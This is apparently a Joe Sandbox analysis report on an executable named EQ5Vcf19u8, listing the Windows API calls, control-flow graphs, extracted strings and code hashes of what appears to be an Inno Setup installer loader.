                                                                                        • API String ID: 3757039580-3001827809
                                                                                        • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                        • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                        • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(00020478,000000FC,00409960), ref: 0040AB15
                                                                                          • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                          • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8,00000000), ref: 00409A70
                                                                                          • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                          • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8), ref: 00409AA4
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(00020478,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                        • API String ID: 3586484885-3001827809
                                                                                        • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                        • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8,00000000), ref: 00409A70
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                        • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724B0,00409AD8), ref: 00409AA4
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724B0), ref: 0040966C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                        • String ID: D
                                                                                        • API String ID: 3356880605-2746444292
                                                                                        • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                        • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 730355536-0
                                                                                        • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                        • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                        • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                        • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                        • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 385 407912-407917 363->385 386 4078ed-407910 363->386 382 407820-407823 364->382 383 407890-407893 364->383 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->349 379->382 380->358 387 4077cf-4077d4 380->387 384 407898 382->384 388 407824 382->388 383->384 391 40789a 384->391 386->385 386->386 387->355 392 4077d6-4077de 387->392 390 407825 388->390 388->391 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->384 397 4078a1 394->397 398 40782f 394->398 395->397 402 4078a3 397->402 403 4078ac 397->403 400 407832-407833 398->400 401 4078a5-4078aa 398->401 400->355 400->379 405 4078ae-4078af 401->405 402->401 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->384 407 4078bf-4078c0 406->407
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                        • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 419 401ff1-401ff6 414->419 415->416 417 402038-40203c 416->417 418 4020cb-4020d1 416->418 420 402041-402050 417->420 421 40203e 417->421 423 4020d3-4020e0 418->423 424 40211d-40211f call 401ee0 418->424 422 40214f-402158 419->422 420->418 427 402052-402060 420->427 421->420 425 4020e2-4020ea 423->425 426 4020ef-40211b call 402f54 423->426 432 402124-40213b 424->432 425->426 426->422 430 402062-402066 427->430 431 40207c-402080 427->431 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 440 402147 432->440 441 40213d-402142 RtlLeaveCriticalSection 432->441 434->435 439 4020a2-4020c6 call 402f54 435->439 437->438 438->439 439->422 441->440
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                          • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                          • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                          • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                          • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 296031713-0
                                                                                        • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                        • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                        • String ID:
                                                                                        • API String ID: 2987862817-0
                                                                                        • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                        • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                        • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 1948546556-0
                                                                                        • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                        • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                        • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                        • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                          • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
